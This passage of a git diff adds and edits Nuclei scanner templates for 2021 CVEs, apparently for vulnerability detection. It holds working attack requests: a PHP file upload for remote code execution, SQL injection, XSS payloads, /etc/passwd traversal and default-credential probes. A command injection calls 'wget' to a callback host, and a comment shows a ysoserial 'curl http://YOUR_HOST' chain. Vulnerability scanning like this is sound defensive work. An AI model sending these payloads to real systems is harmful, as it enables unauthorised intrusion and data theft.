CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 + tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind requests: - method: GET diff --git a/poc/cve/cve-2021-24499.yaml b/poc/cve/cve-2021-24499.yaml new file mode 100644 index 0000000000..ec9b42b879 --- /dev/null +++ b/poc/cve/cve-2021-24499.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-24499 + +info: + name: WordPress Workreap - Remote Code Execution + author: daffainfo + severity: critical + description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts. + reference: + - https://github.com/RyouYoo/CVE-2021-24499 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24499 + - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb + - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24499 + cwe-id: CWE-434 + tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive,wp,workreap + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9 + X-Requested-With: XMLHttpRequest + + -----------------------------cd0dc6bdc00b1cf9 + Content-Disposition: form-data; name="action" + + workreap_award_temp_file_uploader + -----------------------------cd0dc6bdc00b1cf9 + Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php" + Content-Type: application/x-httpd-php + + + -----------------------------cd0dc6bdc00b1cf9-- + + - | + GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "71abe5077dae2754c36d731cc1534d4d" + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2021-24746.yaml b/poc/cve/cve-2021-24746.yaml index 666d1918ad..3ed4f8b80a 100644 --- a/poc/cve/cve-2021-24746.yaml +++ b/poc/cve/cve-2021-24746.yaml @@ -8,14 +8,14 @@ info: reference: - https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa - https://nvd.nist.gov/vuln/detail/CVE-2021-24746 - metadata: - google-query: 'inurl:"/wp-content/plugins/sassy-social-share"' - tags: cve,cve2021,wordpress,wp-plugin,xss,wp classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-24746 cwe-id: CWE-79 + metadata: + google-query: inurl:"/wp-content/plugins/sassy-social-share" + tags: cve,cve2021,wordpress,wp-plugin,xss,wp requests: - method: GET diff --git a/poc/cve/cve-2021-24762.yaml b/poc/cve/cve-2021-24762.yaml index b57087c79e..6d5d1735a8 100644 --- a/poc/cve/cve-2021-24762.yaml +++ b/poc/cve/cve-2021-24762.yaml @@ -1,14 +1,16 @@ id: CVE-2021-24762 info: - name: Perfect Survey WordPress plugin before 1.5.2 SQLI + name: WordPress Perfect Survey<1.5.2 - SQL Injection author: cckuailong severity: critical - description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. + description: | + Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. reference: - https://www.exploit-db.com/exploits/50766 - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget - https://nvd.nist.gov/vuln/detail/CVE-2021-24762 + - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -23,15 +25,16 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 404 + - type: dsl + dsl: + - 'duration>=4' - type: word part: header words: - "wp-ps-session" - - type: dsl - dsl: - - 'duration>=4' + - type: status + status: + - 404 +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2021-24891.yaml b/poc/cve/cve-2021-24891.yaml new file mode 100644 index 0000000000..d739a52f93 --- /dev/null +++ b/poc/cve/cve-2021-24891.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-24891 + +info: + name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: | + WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability. + reference: + - https://www.jbelamor.com/xss-elementor-lightox.html + - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d + - https://nvd.nist.gov/vuln/detail/CVE-2021-24891 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24891 + cwe-id: CWE-79 + epss-score: 0.00116 + epss-percentile: 0.45185 + cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: elementor + product: website_builder + framework: wordpress + tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js" + - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200 + + - type: regex + part: body_1 + regex: + - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" + + extractors: + - type: regex + name: version + group: 1 + regex: + - "elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)" + internal: true + + - type: kval + kval: + - version +# digest: 4a0a00473045022100b1b700b6532302e33f9c282b91d1b67cb96740315c551d6ebc680cc011903d7b02205591616553b2ecff73f2c1dda08659978ac1aef414e995efd1f285d6b02c293b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-25864.yaml b/poc/cve/cve-2021-25864.yaml index 25fbcc58c2..ef5001e046 100644 --- a/poc/cve/cve-2021-25864.yaml +++ b/poc/cve/cve-2021-25864.yaml @@ -1,4 +1,5 @@ id: CVE-2021-25864 + info: name: Hue Magic - Directory Traversal author: 0x_Akoko @@ -12,6 +13,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25864 cwe-id: CWE-22 + metadata: + shodan-query: title:"NODE-RED" tags: cve,cve2021,huemagic,lfi requests: @@ -24,7 +27,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/poc/cve/cve-2021-26086.yaml b/poc/cve/cve-2021-26086.yaml index 034fb34e9e..6f562be26f 100644 --- a/poc/cve/cve-2021-26086.yaml +++ b/poc/cve/cve-2021-26086.yaml @@ -1,21 +1,19 @@ id: CVE-2021-26086 info: - name: Atlassian Jira Limited - Local File Inclusion + name: Jira Limited Local File Read author: cocxanh severity: medium - description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. + description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. reference: - https://jira.atlassian.com/browse/JRASERVER-72695 - - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html - https://nvd.nist.gov/vuln/detail/CVE-2021-26086 + - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26086 cwe-id: CWE-22 - metadata: - shodan-query: http.component:"Atlassian Jira" tags: cve,cve2021,jira,lfi requests: @@ -35,5 +33,3 @@ requests: - "" part: body condition: and - -# Enhanced by mp on 2022/07/22 diff --git a/poc/cve/cve-2021-26812.yaml b/poc/cve/cve-2021-26812.yaml new file mode 100644 index 0000000000..e5378cec02 --- /dev/null +++ b/poc/cve/cve-2021-26812.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-26812 + +info: + name: Moodle jitsi plugin XSS + author: aceseven (digisec360) + severity: medium + description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can + inject javascript code to be run by the application. + reference: + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-26812 + cwe-id: CWE-79 + tags: cve,cve2021,moodle,jitsi,xss,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert(document.domain);" + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "MoodleSession" diff --git a/poc/cve/cve-2021-26855.yaml b/poc/cve/cve-2021-26855.yaml new file mode 100644 index 0000000000..ae5e857ac7 --- /dev/null +++ b/poc/cve/cve-2021-26855.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-26855 + +info: + name: Microsoft Exchange Server SSRF Vulnerability + author: madrobot + severity: critical + description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. + reference: + - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855 + - https://proxylogon.com/#timeline + - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse + - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 + - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 + remediation: Apply the appropriate security update. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-26855 + tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft + +requests: + - raw: + - | + GET /owa/auth/x.js HTTP/1.1 + Host: {{Hostname}} + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/02/04 diff --git a/poc/cve/cve-2021-27651.yaml b/poc/cve/cve-2021-27651.yaml new file mode 100644 index 0000000000..12c81fa998 --- /dev/null +++ b/poc/cve/cve-2021-27651.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-27651 + +info: + name: Pega Infinity - Authentication Bypass + author: idealphase + severity: critical + description: Pega Infinity versions 8.2.1 through 8.5.2 contain an authentication bypass vulnerability because the password reset functionality for local accounts can be used to bypass local authentication checks. + reference: + - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-27651 + - https://collaborate.pega.com/discussion/pega-security-advisory-a21-hotfix-matrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-27651 + cwe-id: CWE-287,CWE-640 + tags: cve,cve2021,pega,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/prweb/PRAuth/app/default/" + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Pega Infinity" + part: body + + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body + + extractors: + - type: regex + regex: + - 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])' + part: body + +# Enhanced by mp on 2022/05/17 diff --git a/poc/cve/cve-2021-27748.yaml b/poc/cve/cve-2021-27748.yaml new file mode 100644 index 0000000000..471a3628f9 --- /dev/null +++ b/poc/cve/cve-2021-27748.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-27748 + +info: + name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery + author: pdteam + severity: high + description: | + IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + classification: + cve-id: CVE-2021-27748 + metadata: + verified: true + max-request: 3 + shodan-query: http.html:"IBM WebSphere Portal" + tags: cve2021,cve,hcl,ibm,ssrf,websphere + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Interactsh Server" + + - type: word + part: body_1 + words: + - "Interactsh Server" + negative: true +# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2021-28150.yaml b/poc/cve/cve-2021-28150.yaml new file mode 100644 index 0000000000..8c9d76f47e --- /dev/null +++ b/poc/cve/cve-2021-28150.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-28150 + +info: + name: Hongdian Sensitive Information + author: gy741 + severity: medium + description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 + - http://en.hongdian.com/Products/Details/H8922 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2021-28150 + cwe-id: CWE-20 + tags: cve,cve2021,hongdian,exposure + +requests: + - raw: + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + + - | + GET /backup2.cgi HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/octet-stream" + part: header + + - type: word + words: + - "CLI configuration saved from vty" + - "service webadmin" + part: body \ No newline at end of file diff --git a/poc/cve/cve-2021-29490.yaml b/poc/cve/cve-2021-29490.yaml new file mode 100644 index 0000000000..863badcd39 --- /dev/null +++ b/poc/cve/cve-2021-29490.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-29490 + +info: + name: Jellyfin 10.7.2 SSRF + author: alph4byt3 + severity: medium + description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-29490 + - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: CVE-2021-29490 + cwe-id: CWE-918 + remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote". + tags: cve,cve2021,ssrf,jellyfin + +requests: + - method: GET + path: + - "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}" + - "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by cs on 2022/02/25 diff --git a/poc/cve/cve-2021-29625.yaml b/poc/cve/cve-2021-29625.yaml new file mode 100644 index 0000000000..70287d1af1 --- /dev/null +++ b/poc/cve/cve-2021-29625.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-29625 + +info: + name: Adminer reflected XSS via the table parameter + author: daffainfo + severity: medium + description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`). + reference: + - https://sourceforge.net/p/adminer/bugs-and-features/797/ + - https://www.cvedetails.com/cve/CVE-2021-29625/ + - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-29625 + cwe-id: CWE-79 + tags: cve,cve2021,adminer,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-30151.yaml b/poc/cve/cve-2021-30151.yaml new file mode 100644 index 0000000000..4c58103107 --- /dev/null +++ b/poc/cve/cve-2021-30151.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-30151 + +info: + name: Sidekiq 5.1.3 and 6.x-6.2.0 - Cross-Site Scripting + author: DhiyaneshDk + severity: medium + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + reference: + - https://github.com/mperham/sidekiq/issues/4852 + - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 + - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-30151 + cwe-id: CWE-79 + tags: cve,cve2021,xss,sidekiq + +requests: + - method: GET + path: + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "onmouseover=\"alert('nuclei')" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-30497.yaml b/poc/cve/cve-2021-30497.yaml index 26399d5eb2..28669446a4 100644 --- a/poc/cve/cve-2021-30497.yaml +++ b/poc/cve/cve-2021-30497.yaml @@ -5,8 +5,13 @@ info: author: gy741 severity: high description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder - reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ + reference: + - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ + - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US + - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2021-30497 tags: cve,cve2021,avalanche,traversal diff --git a/poc/cve/cve-2021-31682.yaml b/poc/cve/cve-2021-31682.yaml index d2564812c7..84cf77c107 100644 --- a/poc/cve/cve-2021-31682.yaml +++ b/poc/cve/cve-2021-31682.yaml @@ -4,17 +4,18 @@ info: name: WebCTRL OEM <= 6.5 Reflected Cross-Site Scripting author: gy741,dhiyaneshDk severity: medium - description: "WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter." + description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-31682 - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS + - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-31682 cwe-id: CWE-79 metadata: - shodan-query: 'html:"/_common/lvl5/dologin.jsp"' + shodan-query: html:"/_common/lvl5/dologin.jsp" tags: cve,cve2021,webctrl,xss requests: diff --git a/poc/cve/cve-2021-31755.yaml b/poc/cve/cve-2021-31755.yaml index 62c5ce19ca..2e3d564f16 100644 --- a/poc/cve/cve-2021-31755.yaml +++ b/poc/cve/cve-2021-31755.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31755 cwe-id: CWE-787 - tags: cve,cve2021,tenda,rce,oast,router,mirai,kev + tags: cve,cve2021,tenda,rce,oast,router,mirai requests: - raw: diff --git a/poc/cve/cve-2021-31856.yaml b/poc/cve/cve-2021-31856.yaml new file mode 100644 index 0000000000..e087dac85d --- /dev/null +++ b/poc/cve/cve-2021-31856.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-31856 + +info: + name: Layer5 Meshery 0.5.2 - SQL Injection + author: princechaddha + severity: critical + description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns + in models/meshery_pattern_persister.go). + reference: + - https://github.com/ssst0n3/CVE-2021-31856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 + - https://meshery.io + - https://github.com/layer5io/meshery/pull/2745 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-31856 + cwe-id: CWE-89 + tags: sqli,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0" + + matchers-condition: and + matchers: + + - type: word + words: + - "709b38b27304df6257a86a60df742c4c" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/17 diff --git a/poc/cve/cve-2021-32820.yaml b/poc/cve/cve-2021-32820.yaml new file mode 100644 index 0000000000..0bed29da10 --- /dev/null +++ b/poc/cve/cve-2021-32820.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-32820 + +info: + name: Express-handlebars Path Traversal + author: dhiyaneshDk + severity: high + description: Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json + - https://github.com/express-handlebars/express-handlebars/pull/163 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2021-32820 + cwe-id: CWE-200 + tags: cve,cve2021,expressjs,lfi,xxe + +requests: + - method: GET + path: + - "{{BaseURL}}/?layout=/etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" + - "daemon:[x*]:0:0:" + - "operator:[x*]:0:0:" + part: body + condition: or diff --git a/poc/cve/cve-2021-33544.yaml b/poc/cve/cve-2021-33544.yaml new file mode 100644 index 0000000000..f11afe8e8c --- /dev/null +++ b/poc/cve/cve-2021-33544.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-33544 + +info: + name: Geutebruck RCE + author: gy741 + severity: high + description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + reference: + - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ + - https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ + - https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 + tags: cve,cve2021,geutebruck,rce,oast + +requests: + - raw: + - | + GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2021-35265.yaml b/poc/cve/cve-2021-35265.yaml index 691710c75c..4acd2368ef 100644 --- a/poc/cve/cve-2021-35265.yaml +++ b/poc/cve/cve-2021-35265.yaml @@ -8,9 +8,10 @@ info: reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 + - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-35265 cwe-id: CWE-79 tags: cve,cve2021,maxsite,xss diff --git a/poc/cve/cve-2021-35464.yaml b/poc/cve/cve-2021-35464.yaml new file mode 100644 index 0000000000..f71ba6c55b --- /dev/null +++ b/poc/cve/cve-2021-35464.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-35464 + +info: + name: ForgeRock OpenAM <7.0 - Remote Code Execution + author: madrobot + severity: critical + description: | + ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. + The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted + /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) + found in versions of Java 8 or earlier. + reference: + - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464 + - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html + - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 + tags: cve,cve2021,openam,rce,java + +requests: + - method: GET + path: + - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + + # '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=' + # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + 